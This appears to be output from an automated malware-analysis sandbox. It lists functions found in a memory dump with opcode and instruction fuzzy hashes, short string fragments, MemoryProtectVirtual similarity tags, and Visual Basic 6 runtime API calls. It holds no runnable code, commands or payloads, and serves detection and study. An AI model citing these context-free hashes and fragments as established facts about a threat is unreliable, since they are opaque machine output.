Opcode Fuzzy Hash: 48b94450bc500dd0fd286b91235140ea484a090b5eb18440e0160a0cb177c4d8
Instruction Fuzzy Hash: 0951363559438ECFDF349EA4CC09BEA7BA1BF15340F46401ADD499B614E7318A42DF92

Uniqueness

Uniqueness Score: -1.00%

Function 0227BE73, Relevance: 3.0, Strings: 2, Instructions: 476COMMON

Download Yara Rule

Strings

S<O!, xrefs: 0227BF6C
3\j, xrefs: 0227C5F3

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID: S<O!$3\j
API String ID: 2706961497-4039686892
Opcode ID: 36d7d3070ab3037589987e49c19c2d5284b5c353bbc7d67b081d3fc63bb5b0fd
Instruction ID: 4ae649e588ac3f7b36a4f870441ed1d19f56dee1f5c1da7a7b47c6c09da18e85
Opcode Fuzzy Hash: 36d7d3070ab3037589987e49c19c2d5284b5c353bbc7d67b081d3fc63bb5b0fd
Instruction Fuzzy Hash: 7D22E57151C3C58FCB35CF38C8987DABBD2AF56320F4981AAC8998F29AD7748641C716

Uniqueness

Uniqueness Score: -1.00%

Function 0227BE7D, Relevance: 2.9, Strings: 2, Instructions: 355COMMON

Download Yara Rule

Strings

S<O!, xrefs: 0227BF6C
3\j, xrefs: 0227C5F3

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID: S<O!$3\j
API String ID: 2706961497-4039686892
Opcode ID: bd4423b1b24894ae0a0a9e5aea33d6bc7d84801a87ea36eeefe4885e7c83d1a4
Instruction ID: f8cb71be7a5fdfdd81f87ecf03eb635d0635fab26606a5bf3378648ad1d62a9d
Opcode Fuzzy Hash: bd4423b1b24894ae0a0a9e5aea33d6bc7d84801a87ea36eeefe4885e7c83d1a4
Instruction Fuzzy Hash: A3E1F3315187C58FDB25CF38C899796BFD1AF17320F4A82EAC8994F2A6C7718506CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0227B523, Relevance: 2.8, Strings: 2, Instructions: 250COMMON

Download Yara Rule

Strings

J[/r, xrefs: 0227B7DE
~.Yx, xrefs: 0227B95E

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID: J[/r$~.Yx
API String ID: 0-1647558026
Opcode ID: 150909171294081ca87b29acfd8dd14322212054b2f5c58785809adaa44bee2c
Instruction ID: 3f6e64ff8838a4639570448122772667a1a39cfa4856b959feb0cf502d986b53
Opcode Fuzzy Hash: 150909171294081ca87b29acfd8dd14322212054b2f5c58785809adaa44bee2c
Instruction Fuzzy Hash: B2A1267162834ADFCB349E7889953EA77B1EF48344F81012EDC8E8B208D7745A85CB56

Uniqueness

Uniqueness Score: -1.00%

Function 02272655, Relevance: 2.7, Strings: 2, Instructions: 243COMMON

Download Yara Rule

Strings

2w\, xrefs: 02272757
K~|J, xrefs: 02272883

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 2w\$K~|J
API String ID: 0-3961208027
Opcode ID: e057076061fa996e07f68eec0453abbd170d85daf15e9999e777a639cc21d9cb
Instruction ID: 1cc075fe001017eb0c14bbe5f0131972146398ddf0301ea58275742a812bf43f
Opcode Fuzzy Hash: e057076061fa996e07f68eec0453abbd170d85daf15e9999e777a639cc21d9cb
Instruction Fuzzy Hash: D0715739859789CFCB25DE68C85B2D47FA0AF17254F490289CD900F266DB325917CFA3

Uniqueness

Uniqueness Score: -1.00%

Function 02275FF4, Relevance: 2.6, Strings: 2, Instructions: 146COMMON

Download Yara Rule

Strings

@4C, xrefs: 0227DAF6
KLI9, xrefs: 0227DB57

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID: @4C$KLI9
API String ID: 0-1849418676
Opcode ID: 1e8dd063917418503c1a7e18a37bf53d018fd39eb5508514e36aff39e33343d8
Instruction ID: c113107cf7b00bd562b71da83d12c6b72196006e554bd003c0ffd0f50f2f8d73
Opcode Fuzzy Hash: 1e8dd063917418503c1a7e18a37bf53d018fd39eb5508514e36aff39e33343d8
Instruction Fuzzy Hash: D5515471614301DFC7248F64C988BDA77B2FF49360F828299DC998F269C3358981CF96

Uniqueness

Uniqueness Score: -1.00%

Function 0227B4E9, Relevance: 1.5, Instructions: 1520COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e8e5178e7eb85ee7466af250fc38e127f94b19d57cc574a4501ba8343d5b380
Instruction ID: 8ab45e046cae43216d9d57a7c9ce299cb0c2aec71940a6e477774d3f41bf551f
Opcode Fuzzy Hash: 6e8e5178e7eb85ee7466af250fc38e127f94b19d57cc574a4501ba8343d5b380
Instruction Fuzzy Hash: D0E18A2602D6E78BD723CB6488566937F63ED8322576D54CAC4D29F56BC324C48B83D2

Uniqueness

Uniqueness Score: -1.00%

Function 0227C016, Relevance: 1.5, Strings: 1, Instructions: 257COMMON

Download Yara Rule

Strings

3\j, xrefs: 0227C5F3

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 3\j
API String ID: 0-3055272097
Opcode ID: 92ef6f412a7a0974aaadf4d05ceced723272fb6cb47008fdfa7aa8e23e1af621
Instruction ID: 238554bb679f9e764b1654aa14025ef45ceb3af27c5c846a6b033e2fbe794b26
Opcode Fuzzy Hash: 92ef6f412a7a0974aaadf4d05ceced723272fb6cb47008fdfa7aa8e23e1af621
Instruction Fuzzy Hash: 12B1E02154C7C58EDB258F38C8997D6BFD25F13320F4A82EAC89A4F2EAC7754205C716

Uniqueness

Uniqueness Score: -1.00%

Function 0227BFB4, Relevance: 1.5, Strings: 1, Instructions: 251COMMON

Download Yara Rule

Strings

3\j, xrefs: 0227C5F3

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID: 3\j
API String ID: 2706961497-3055272097
Opcode ID: 72bd1e046c30d1b6b0c5a8f124d1650c43a68e9b253929102fe1622e63bc1026
Instruction ID: 253f5a0dd6528ca5b605eba70794bb325cc9faf7c53d639838bdc75ee71c1e3b
Opcode Fuzzy Hash: 72bd1e046c30d1b6b0c5a8f124d1650c43a68e9b253929102fe1622e63bc1026
Instruction Fuzzy Hash: 95B1C03151C7C58ADB358F3888987DABFD25F52320F4AC2EAC89A4F2EAC7744641C716

Uniqueness

Uniqueness Score: -1.00%

Function 0227C09D, Relevance: 1.5, Strings: 1, Instructions: 231COMMON

Download Yara Rule

Strings

3\j, xrefs: 0227C5F3

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 3\j
API String ID: 0-3055272097
Opcode ID: 69dfe6e2a913d31172bee8ddb1d2c7dcba409e067739d5fcb682bc89190adbb5
Instruction ID: 534d92d083567d57a4431df100fad02d858b710723d0b39934fbd887981ad49a
Opcode Fuzzy Hash: 69dfe6e2a913d31172bee8ddb1d2c7dcba409e067739d5fcb682bc89190adbb5
Instruction Fuzzy Hash: 6B91C33155C7C58ADF358F38C8A97D6BFD1AF12320F4982AAC89A4F2EAC7714501CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0227C114, Relevance: 1.5, Strings: 1, Instructions: 213COMMON

Download Yara Rule

Strings

3\j, xrefs: 0227C5F3

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 3\j
API String ID: 0-3055272097
Opcode ID: a4715aff889476d3abc91b8d85b6595fd8180cb9e2cee71891f85b28b71c11b5
Instruction ID: 204026be955422112837849483adf08e4180e23f9c91f50e12152ce28a76e813
Opcode Fuzzy Hash: a4715aff889476d3abc91b8d85b6595fd8180cb9e2cee71891f85b28b71c11b5
Instruction Fuzzy Hash: 708106315597958BCF358F38C8A57E6BBD2AF12320F4981AAC89A4F29AC7314601CB53

Uniqueness

Uniqueness Score: -1.00%

Function 0227C192, Relevance: 1.4, Strings: 1, Instructions: 199COMMON

Download Yara Rule

Strings

3\j, xrefs: 0227C5F3

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 3\j
API String ID: 0-3055272097
Opcode ID: 1e4fc7ab72b731cd4a48de0154c2fdeae0e345319f628adfbd02d94253aaaa93
Instruction ID: d13f7b335167c2b2b5754eb8d1a0b53e7247a1c895b2d0f0bea3d7ba3bd4f29e
Opcode Fuzzy Hash: 1e4fc7ab72b731cd4a48de0154c2fdeae0e345319f628adfbd02d94253aaaa93
Instruction Fuzzy Hash: CD7126315592958BCF358F38C8A53EABBD2AF17320F4941ABC89A4F299C7314601CB57

Uniqueness

Uniqueness Score: -1.00%

Function 0227B525, Relevance: 1.4, Strings: 1, Instructions: 175COMMON

Download Yara Rule

Strings

J[/r, xrefs: 0227B7DE

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID: J[/r
API String ID: 0-420712041
Opcode ID: ce8eccf86a20f94a54eb7126bca24b7124a8e1f1cb1f65e6eb9d2f695f79974e
Instruction ID: c590ed1351b2c8593300eeedccac066e97fccbba224d3b32e479702a4fe93554
Opcode Fuzzy Hash: ce8eccf86a20f94a54eb7126bca24b7124a8e1f1cb1f65e6eb9d2f695f79974e
Instruction Fuzzy Hash: 3A613575658359DFCF309EB8C9953EA7BB1BF09340F820119CD899B218C7709A86CB93

Uniqueness

Uniqueness Score: -1.00%

Function 0227C251, Relevance: 1.4, Strings: 1, Instructions: 167COMMON

Download Yara Rule

Strings

3\j, xrefs: 0227C5F3

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 3\j
API String ID: 0-3055272097
Opcode ID: 67bd998db66a076e2fdd6505fb1cf7ba105ac4ac175d95eb551821e6737fe756
Instruction ID: d6f6782b6321fef517b35514da40da792a4e91fb4fc6c96a2da8a262e4baedc0
Opcode Fuzzy Hash: 67bd998db66a076e2fdd6505fb1cf7ba105ac4ac175d95eb551821e6737fe756
Instruction Fuzzy Hash: BB5126319582848FDF39CF38C8A57DABBD1AF16320F4941AEC84A4F28AC7714641CB53

Uniqueness

Uniqueness Score: -1.00%

Function 0227B785, Relevance: 1.4, Strings: 1, Instructions: 162COMMON

Download Yara Rule

Strings

J[/r, xrefs: 0227B7DE

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID: J[/r
API String ID: 0-420712041
Opcode ID: 7de3074529f78ad8a6a3c3b1bb53e4ac704d1eb5c99944d48c9df5031837e9f9
Instruction ID: f256eb865fa0b9fc2c7be90225d278d72316df0c5aefe45ccff6e728120be755
Opcode Fuzzy Hash: 7de3074529f78ad8a6a3c3b1bb53e4ac704d1eb5c99944d48c9df5031837e9f9
Instruction Fuzzy Hash: F1510335658399DFCF349E68C9953DABBB1BF09344F820119CD899B218C7705A86CF93

Uniqueness

Uniqueness Score: -1.00%

Function 0227B6DF, Relevance: 1.4, Strings: 1, Instructions: 160COMMON

Download Yara Rule

Strings

J[/r, xrefs: 0227B7DE

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID: J[/r
API String ID: 0-420712041
Opcode ID: 49bf820f3e93505ed8735582c319962eb28a77b8d7fbdf88d03966a28c2b349e
Instruction ID: 218beac9bc66be8f2e0cf908b6dc8466c95e94cf6029860282ec85d13c9b353e
Opcode Fuzzy Hash: 49bf820f3e93505ed8735582c319962eb28a77b8d7fbdf88d03966a28c2b349e
Instruction Fuzzy Hash: D0510435658399DFCF349E78C9953DABBB1AF09344F820119CD899B218C7705A86CF93

Uniqueness

Uniqueness Score: -1.00%

Function 0227B651, Relevance: 1.4, Strings: 1, Instructions: 159COMMON

Download Yara Rule

Strings

J[/r, xrefs: 0227B7DE

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID: J[/r
API String ID: 0-420712041
Opcode ID: e933ccd86d6efd725b2a3ed85920042bdfa6adedf731b07783d03ecc33cd84e1
Instruction ID: 7a9a8ea86b9c1ca71b62c9dd4965ef468593f2ac83682c7d91cca39b6c9ce2c4
Opcode Fuzzy Hash: e933ccd86d6efd725b2a3ed85920042bdfa6adedf731b07783d03ecc33cd84e1
Instruction Fuzzy Hash: FF511335658399DFCF349E78C9953DABBB1AF09344F820119CD899B218C7705A86CFA3

Uniqueness

Uniqueness Score: -1.00%

Function 0227B5A3, Relevance: 1.4, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

J[/r, xrefs: 0227B7DE

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID: J[/r
API String ID: 0-420712041
Opcode ID: b5be054bddd9bdfdbe34b0a95764e30dcecba1eeaf123dcdfa5b60da45e0eae3
Instruction ID: eb0fc153b947074406d873701a3c3f32b2405d5b03e4ec1e29e8a07c6c4e77d8
Opcode Fuzzy Hash: b5be054bddd9bdfdbe34b0a95764e30dcecba1eeaf123dcdfa5b60da45e0eae3
Instruction Fuzzy Hash: F9510275658359DFCF309E68C9953EABBB1BF09344F82011ACD898B218C7705A86CF93

Uniqueness

Uniqueness Score: -1.00%

Function 0227C2E1, Relevance: 1.4, Strings: 1, Instructions: 154COMMON

Download Yara Rule

Strings

3\j, xrefs: 0227C5F3

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 3\j
API String ID: 0-3055272097
Opcode ID: 33ad4a9c37b38491bf788c6c40c6da2dc99e8d9d33178cdaae074aa4fd0154ea
Instruction ID: 4b81434f7ba7c5f355552414e7dfe84e57d36b4cff7d6c264da117a495f6073c
Opcode Fuzzy Hash: 33ad4a9c37b38491bf788c6c40c6da2dc99e8d9d33178cdaae074aa4fd0154ea
Instruction Fuzzy Hash: A15103319192858FDF39CF38C8A57D9BBE2AF12220F49419FC84A4F299C7314642CB63

Uniqueness

Uniqueness Score: -1.00%

Function 0227C386, Relevance: 1.4, Strings: 1, Instructions: 132COMMON

Download Yara Rule

Strings

3\j, xrefs: 0227C5F3

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 3\j
API String ID: 0-3055272097
Opcode ID: 63a5a771a6f1b361ab85fc8a27ed268bd3b65507b08d6f19abefb4760859111d
Instruction ID: f051c0d07b3e3dbec2a386d06e707edaa4aacc7072bb8211bb1b67af342fbbfa
Opcode Fuzzy Hash: 63a5a771a6f1b361ab85fc8a27ed268bd3b65507b08d6f19abefb4760859111d
Instruction Fuzzy Hash: 3A4127355592888FDF348F34C8A67D5BBD2AF16660F8A419BCC4A4F249C7714642CF63

Uniqueness

Uniqueness Score: -1.00%

Function 022763DF, Relevance: 1.4, Strings: 1, Instructions: 132COMMON

Download Yara Rule

Strings

GlZ, xrefs: 022766A8

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID: GlZ
API String ID: 0-477890162
Opcode ID: 6ffec379e4532bad4fc782a5cbb8ef00b9c78d584c92202180ee0706b5273d4c
Instruction ID: 624cb71e38b098ea6296a31b8fdb5c19a741d4c879bd349f606576757e00050c
Opcode Fuzzy Hash: 6ffec379e4532bad4fc782a5cbb8ef00b9c78d584c92202180ee0706b5273d4c
Instruction Fuzzy Hash: 8B51DB35919B84CFCB30CE65C9E97EA7BF2EF09780F44411AC94D9B605C371AA01CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0227B927, Relevance: 1.4, Strings: 1, Instructions: 131COMMON

Download Yara Rule

Strings

J[/r, xrefs: 0227B7DE

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID: J[/r
API String ID: 0-420712041
Opcode ID: 4f3924c986e88d7c06a664d94d21ab76d19f0de91948387e9328dbe0dec0ddd8
Instruction ID: 087892f62650a6cd0c926095441597b566a7730f8c05a4fae33679eec001746a
Opcode Fuzzy Hash: 4f3924c986e88d7c06a664d94d21ab76d19f0de91948387e9328dbe0dec0ddd8
Instruction Fuzzy Hash: 3151037565839ADFCF749EB889953EAB7B1BF08340F81011ECC8E9B118C3705685CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0227B87F, Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

J[/r, xrefs: 0227B7DE

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID: J[/r
API String ID: 0-420712041
Opcode ID: e9ca5f2784814ce68618deb9f49eea940c53002eae2faf6b276984d0307589a5
Instruction ID: c1107f6fe646a4be5272882f2081d213cc5173e1f6d4ef366e703f97992ad207
Opcode Fuzzy Hash: e9ca5f2784814ce68618deb9f49eea940c53002eae2faf6b276984d0307589a5
Instruction Fuzzy Hash: 5751017566839ADFCF749E7889953EAB7B1BF08340F82011ECC8E9B118C3705A85CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0227C2DF, Relevance: 1.4, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

3\j, xrefs: 0227C5F3

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 3\j
API String ID: 0-3055272097
Opcode ID: 15360671a48f0d6d906caf77ea6d8950bd9d40a029827057813abecf84360a80
Instruction ID: 97b9648d2a46ee4d5ffc43ebc1613a2b55a0dd811bb7ba6032970a3f8a31b7d7
Opcode Fuzzy Hash: 15360671a48f0d6d906caf77ea6d8950bd9d40a029827057813abecf84360a80
Instruction Fuzzy Hash: FE51B571A192858BDF79DF3888947E9BBD2AF51320F4981AFCC4A8F289C7354641CB16

Uniqueness

Uniqueness Score: -1.00%

Function 022763DD, Relevance: 1.4, Strings: 1, Instructions: 117COMMON

Download Yara Rule

Strings

GlZ, xrefs: 022766A8

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID: GlZ
API String ID: 0-477890162
Opcode ID: 9dd998a1c26c157a00ba432912d599230c4be687c1ab092058a9bb549b3b3e35
Instruction ID: cd4801feb30595d5c57d8791bab01a26908a834dac842b0456630456d532a450
Opcode Fuzzy Hash: 9dd998a1c26c157a00ba432912d599230c4be687c1ab092058a9bb549b3b3e35
Instruction Fuzzy Hash: DC51BE71918B44CFCB70CEA5C9E87EA77F6BF48780F54402AC94D9B609D371AA40CB44

Uniqueness

Uniqueness Score: -1.00%

Function 022764C8, Relevance: 1.4, Strings: 1, Instructions: 104COMMON

Download Yara Rule

Strings

GlZ, xrefs: 022766A8

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID: GlZ
API String ID: 0-477890162
Opcode ID: 37f5d4f5b4331442de16a935babde48b14c2ac2db887e6bd421f4fa9e9f69788
Instruction ID: 7dc785d25769cf340e8dc175277f84c4f41d383beb73a6350fa63a9596a5249a
Opcode Fuzzy Hash: 37f5d4f5b4331442de16a935babde48b14c2ac2db887e6bd421f4fa9e9f69788
Instruction Fuzzy Hash: 98310339959744DFCB30CEA5C9EA6D67BF1EF0E684F841116C9480F605D770A602CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0227ABD4, Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

/{, xrefs: 0227AC08

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID: /{
API String ID: 0-2484240934
Opcode ID: 3751be5cd29ccdb9ffbd717bf46782d9b1228704215685e9b45c57e9c7cb6117
Instruction ID: e90336315557a122762ede11e2bf835175cab49f736e39505415dbc346df33cf
Opcode Fuzzy Hash: 3751be5cd29ccdb9ffbd717bf46782d9b1228704215685e9b45c57e9c7cb6117
Instruction Fuzzy Hash: 6821D13925938A9FCB308F68C5E1BEE73A1FF1A351F94421DDD8A8B615D6308980D701

Uniqueness

Uniqueness Score: -1.00%

Function 022757CF, Relevance: .2, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9195dd4e1de133e9a6e6b47fd14e7a3fd3562e2cc66dc7a37ebd8ac7e0bb321
Instruction ID: 76b66537653f2e4af66f632f42936d601e4bb30add8c8fbef63392634ecbc2ef
Opcode Fuzzy Hash: b9195dd4e1de133e9a6e6b47fd14e7a3fd3562e2cc66dc7a37ebd8ac7e0bb321
Instruction Fuzzy Hash: 8281873641C385CFCB258FB9C48A695BFF0FF12210F99069DC8818B666D7719556CB83

Uniqueness

Uniqueness Score: -1.00%

Function 02275822, Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec971c387f4bf9f29704ec90d7aaf974e927721217db164822208009d1669509
Instruction ID: 6fdda8e5ced41a0b69b1d4e7c2d1e8b1cd7e4f3ed34fe0e292b2dffbb7353fb0
Opcode Fuzzy Hash: ec971c387f4bf9f29704ec90d7aaf974e927721217db164822208009d1669509
Instruction Fuzzy Hash: 8B51553A418344CFCB29CFB9C48A695BBF0FF16210F990699C9929F666C7708552CB83

Uniqueness

Uniqueness Score: -1.00%

Function 02275802, Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c2ea625e07ff4bea5f08686861955945fb23ae2695597cd0ceff799dc85cc53
Instruction ID: 0deb294d9e498a1a33f7b4be3771f99dd73513143da344fb65e913c31bb9feca
Opcode Fuzzy Hash: 9c2ea625e07ff4bea5f08686861955945fb23ae2695597cd0ceff799dc85cc53
Instruction Fuzzy Hash: 55518836028345CFC729CF79C4456A5FBF0FF52310F99099DC8869BA66C7709592CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02276768, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3068badcd882274a187a3d923a2dc14459289b92036f2f8eb57d5cbe142335d
Instruction ID: 1aeebe172890c5dad1a0857c97ffc5cb0a6ecf917068188a60cd96f81e5f2205
Opcode Fuzzy Hash: b3068badcd882274a187a3d923a2dc14459289b92036f2f8eb57d5cbe142335d
Instruction Fuzzy Hash: 75110675168349DFDB6C5F3499567FB77A2AF44340F42062EA88B86260DB304841CA06

Uniqueness

Uniqueness Score: -1.00%

Function 0227BC79, Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd919b81d2e17a03cf043d504ee4641bd76fb7789d6582d2836623a054514cc9
Instruction ID: fdb95031137fda1560636207ea1f8b20c84fdb596b30db8488cba2457b0796d2
Opcode Fuzzy Hash: bd919b81d2e17a03cf043d504ee4641bd76fb7789d6582d2836623a054514cc9
Instruction Fuzzy Hash: 9511B2325053858BDB38AE758E513EEB7F2AF51364FA6451ECC8ACB129D73196818B01

Uniqueness

Uniqueness Score: -1.00%

Function 0227536A, Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13e444ebf8b4c22d2dbc8f06382f834662403eb79924592017507247ed6099db
Instruction ID: c6c38c641c737413b4547df25f225e2e358c6c16e4d55cbe6fbad42dd65593ca
Opcode Fuzzy Hash: 13e444ebf8b4c22d2dbc8f06382f834662403eb79924592017507247ed6099db
Instruction Fuzzy Hash: 91012230429694CFCB26CF58C884690BBB0FF09228F19069DDC486B322CB72A956CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0227B36F, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b780e01a63f6c4a42b6a90fc1a3057e7bf25e7984a729666fa9a9c1c87eb1a30
Instruction ID: bcda328a10e5e2d878bc36a587af14f9b2b8055486d77ba250bfed9adb41fcdd
Opcode Fuzzy Hash: b780e01a63f6c4a42b6a90fc1a3057e7bf25e7984a729666fa9a9c1c87eb1a30
Instruction Fuzzy Hash: EFC02BC3C3D3964503B330F4B1091AF400306D735C3B6CD602C11AE20CE425CEC11D80

Uniqueness

Uniqueness Score: -1.00%

Function 02277DAD, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f3a4c99a52a0bf1043ca4e2338c74384df1bb0affa59ab7e074d435ea442f10
Instruction ID: e64a82a5fe33b999219e363e6fc7cdbc30b42c40e5bcc5771ca96bcb1eded26e
Opcode Fuzzy Hash: 5f3a4c99a52a0bf1043ca4e2338c74384df1bb0affa59ab7e074d435ea442f10
Instruction Fuzzy Hash: 9AC092B6225680CFEF02CF08D991B60B3A0FB19A88F0C05E0E802CF752C3A4ED00CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0227A66D, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10

Uniqueness

Uniqueness Score: -1.00%

Function 0041EE10, Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

#512.MSVBVM60(004029D0,00000002), ref: 0041EE57
__vbaStrMove.MSVBVM60 ref: 0041EE68
__vbaStrCmp.MSVBVM60(004029B8,00000000), ref: 0041EE70
__vbaFreeStr.MSVBVM60 ref: 0041EE83
#554.MSVBVM60 ref: 0041EE92
#613.MSVBVM60(?,?), ref: 0041EEAB
__vbaStrVarMove.MSVBVM60(?), ref: 0041EEB5
__vbaStrMove.MSVBVM60 ref: 0041EEC0
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0041EECB
__vbaNew2.MSVBVM60(00402904,00423494), ref: 0041EEE7
__vbaHresultCheckObj.MSVBVM60(00000000,0226EB44,004028F4,00000014), ref: 0041EF0C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402914,000000C8), ref: 0041EF36
__vbaFreeObj.MSVBVM60 ref: 0041EF3F
#716.MSVBVM60(?,Ynkmulslerneko,00000000), ref: 0041EF4F
__vbaLateIdSt.MSVBVM60(?,00000000), ref: 0041EF76
__vbaFreeVar.MSVBVM60 ref: 0041EF7F
__vbaNew2.MSVBVM60(00401F48,00423010), ref: 0041EF97
__vbaHresultCheckObj.MSVBVM60(00000000,00738440,0040259C,00000160), ref: 0041EFC2
__vbaLateIdCallLd.MSVBVM60(?,?,00000004,00000000), ref: 0041EFD3
__vbaI4Var.MSVBVM60(00000000), ref: 0041EFDD
